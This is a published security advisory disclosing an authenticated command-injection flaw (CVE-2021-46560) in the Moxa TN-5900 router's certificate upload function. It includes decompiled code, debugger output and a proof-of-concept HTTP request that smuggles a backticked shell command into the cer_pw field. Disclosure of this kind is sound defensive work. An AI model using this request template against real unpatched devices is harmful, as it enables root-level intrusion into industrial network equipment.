-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2022-002: Moxa TN-5900 Post Authentication Command Injection Vulnerability Title: Moxa TN-5900 Post Authentication Command Injection Vulnerability Advisory ID: KL-001-2022-002 Publication Date: 2022.01.28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-002.txt 1. Vulnerability Details Affected Vendor: Moxa Affected Product: TN-5900 Affected Version: v3.1 and prior Platform: Moxa Linux CWE Classification: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CVE ID: CVE-2021-46560 2. Vulnerability Description A user who has authenticated to the management web application is able to leverage a command injection vulnerability in the p12 processing code of the certificate management function web_CERMGMTUpload. 3. Technical Description Following authentication, the webs_CERMGMTUpload API method becomes accessible. This method takes a multi-part HTTP POST request containing four parameters. The cer_pw parameter does not properly neutralize special elements used in operating system commands and therefore it is possible to include encapsulated commands to be executed. In the request below, the cer_pw parameter has been written such that when executed by the operating system a zero byte file will appear in the /tmp directory. See the Proof of Concept section. The relevant pseudo-c for this API method is included below. The websGetVar function is used to retrieve the cer_pw parameter and copies the value into the pass variable. The opcode (mgmtmode) is then compared to the number 2 and when true will prepare a command to be passed to system using the sprintf function. When preparing this command, the pass variable (cer_pw) is included without prior first sanitizing the user input. void web_CERMGMTUpload(longlong *param_1,undefined8 param_2,undefined8 param_3) { ... __nptr = websGetVar(param_1,"mgmtmode",&DAT_120064f68); opcode = atoi(__nptr); __s = websGetVar(param_1,"cer_file",&DAT_120063dd0); local_338 = websGetVar(param_1,"cer_name",&DAT_120063dd0); if ((*local_338 == '\0') || (lVar1 = Ssys_CheckString(local_338), -1 < lVar1)) { sVar2 = strlen(__s); if (CONCAT44(extraout_v0_hi,sVar2) < 0x41) { ... sVar4 = strlen(local_338); if (CONCAT44(extraout_v0_hi_00,sVar4) < 0x41) { ... if (opcode == 2) { memset(pass,0,0x41); __s = websGetVar(param_1,"cer_pw",&DAT_120063dd0); strncpy(pass,__s,0x20); ... } ... __fd = open(inFile,0x102); if (__fd < 0) { ... } else { sVar3 = write(__fd,param_1[0x38],*(param_1 + 0x39)); ... else { if (opcode == 2) { outFile = FUN_120038e28(&local_159); snprintf(cmd,0x100, "openssl pkcs12 -in \"%s\" -out %s -passout pass:%s -password pass:%s",inFile ,outFile,pass,pass); system(cmd); ... } ... } Using a debugger we can see the command as it was programmatically created using our malicious input. This command is passed to the system function. (gdb) x/25s $a0 0xfffbddb284: "openssl pkcs12 -in \"/mnt/log1/p12_file/test.p12\" -out /mnt/ramdisk/p12_tmpfile.pem -passout pass:`touch /tmp/korelogic` -password pass:`touch /tmp/korelogic`" The file has been created. # ls -la /tmp/korelogic -rwxr-xr-x 1 root root 8072 Sep 23 20:30 korelogic It should be noted that the cer_name is exploitable as well. 4. Mitigation and Remediation Recommendation The vendor has released a patch which remediates the described vulnerability. Release notes are available at: https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Josh Hardin of KoreLogic, Inc. 6. Disclosure Timeline 2021.02.05 - KoreLogic submits vulnerability details to Moxa. 2021.02.08 - Moxa acknowledges receipt and the intention to investigate. 2021.03.02 - Moxa notifies KoreLogic that a patch for this vulnerability is expected to be available in June 2021. 2021.04.16 - 45 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.06.07 - KoreLogic requests update on the status of the proposed TN-5900 patch. 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021. 2021.06.23 - 90 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021. 2021.09.22 - 150 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.12.21 - 210 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.12.27 - Moxa notified KoreLogic that the patch is complete and ready for release.. 2021.12.28 - Moxa public acknowledgement. 2022.01.25 - KoreLogic requests CVE from Mitre. 2022.01.28 - KoreLogic public disclosure. 7. Proof of Concept POST /goform/web_CERMGMTUpload HTTP/1.1 Host: [redacted]:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate ... Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266 Content-Length: 605 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="mgmtmode" 2 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="cer_file"; Content-Type: text/plain korelogic -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="cer_name"; Content-Type: text/plain test.p12 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="cer_pw"; `touch /tmp/korelogic` -----------------------------9051914041544843365972754266-- HTTP/1.1 200 OK Server: GoAhead-Webs Pragma: no-cache Cache-control: no-cache Content-Type: text/html The contents of this advisory are copyright(c) 2022 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEETtzSIGy8wE6Vn0geUk0uR1lFz/MFAmH0M9caHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQUk0uR1lFz/PgDxAAoJTkVu9676f44X8QID8P 5Xc9zaIEhmq3qyQJA/jfh2LDnQyGZZkFfhitX0YTzNpDqCzgYo+YVfgfHvPYJ4Xl eJV2yaZeKzWKghbVL3flQ+ofaOkhOSnI+SIONGrHGxpz+m93uJvvRGMeOnfLq6WM h9H6+qAlsCiA+YaQdIYyhsoGype4Ufn7nQfbq1ER08i3pns4QJjQa1ef9US4mO3r V+IvHeG4weE1Muelt5wAqyhRKnmmGd1shBnyS4Dxh1bjXjOCQQjIms00z12Tdont S3eTHJxHWOtY2g7q6jo78bT7zMHQm4rRvMhzS0c1JPZyLMTfEdzGeoGCD4GL3zo1 3yHLrM7VXpgpqx0lJL7YBr5VZSmz8nW5rIxvu56Zroq7cQUFdgq5reFVYPof+nv8 aXAvHfT7Y7GBSVu0Trdu9jrU0I7Bx2zisJT8xNwoD42d8isWCI5QlmF+ifSr0ZvB TlnGRNqNduUANcHl6KDCK1xUr2XeINsJoRhRj8/3YnCta9UB6WYfrFU1J26stdRC a7GDkHlE+cFjMBJ5WrNE6Tku8c4cobK14on0+rtIacXbvCVsXIL/PaKTLZEJlUJj KYaPsx81D5eybP6Ii8/7VnDhVZ9/BXhj1OOzDQCH2ICukcDUxqSAB53HYAqT5CXG JkY/OnLlBunvhSrwfKUj4uA= =tYX6 -----END PGP SIGNATURE-----